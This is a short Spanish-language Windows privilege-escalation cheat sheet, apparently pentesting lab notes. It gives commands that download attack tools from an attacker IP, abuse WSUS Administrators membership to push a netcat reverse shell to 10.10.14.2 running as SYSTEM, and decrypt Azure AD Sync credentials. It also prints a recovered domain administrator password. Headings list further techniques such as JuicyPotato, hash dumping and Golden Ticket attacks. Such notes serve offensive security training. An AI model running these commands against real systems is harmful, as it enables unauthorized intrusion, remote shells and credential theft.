Privesc
privesc
Privesc
Abuso del grupo WSUS Administrator
Archivos necesarios
iwr -uri http://10.10.14.2/SharpWSUS.exe -o SharpWSUS.exe
iwr -uri http://10.10.14.2/PsExec64.exe -o PsExec64.exe
iwr -uri http://10.10.14.2/nc.exe -o nc.exeReverse Shell
.\SharpWSUS.exe create /payload:"C:\Windows\Temp\Privesc\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c C:\\Windows\Temp\Privesc\\nc.exe -e cmd 10.10.14.2 443" /title:"ReverseShell"Abuso del grupo Azure Admins
*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/AdDecrypt.exe -o AdDecrypt.exe
*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/mcrypt.dll -o mcrypt.dll
*Evil-WinRM* PS C:\> cd "C:\Program Files\Microsoft Azure AD Sync\bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Temp\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCALAbuso del grupo DNSAdmins

Creación de binario para la reverse shell
Inserción en un servicio
Reiniciar servicio
Abuso del grupo Server Operators
Listar servicios
Modificación del BinPath de un servicio
Reinicio del proceso
Credenciales cacheadas
Firefox
Uso de firepwd.py
Listar reglas de Firewall
Abuso del privilegio SeImpersonatePrivileage
Uso de JuicyPotato
Uso de Named Pipes
Path
Explotación
Alteración del script
Abuso del servicio userlogger
Detener el servicio
Explotación
Iniciar servicio
Obtener contenido ADS
Dumpeo de hashes NT
Obtener procesos por Identificador
Decrypt groups.xml
Golden Ticket Attack
Abuso de certificados
Abuso de ENROLLEE_SUPPLIES_SUBJECT
Last updated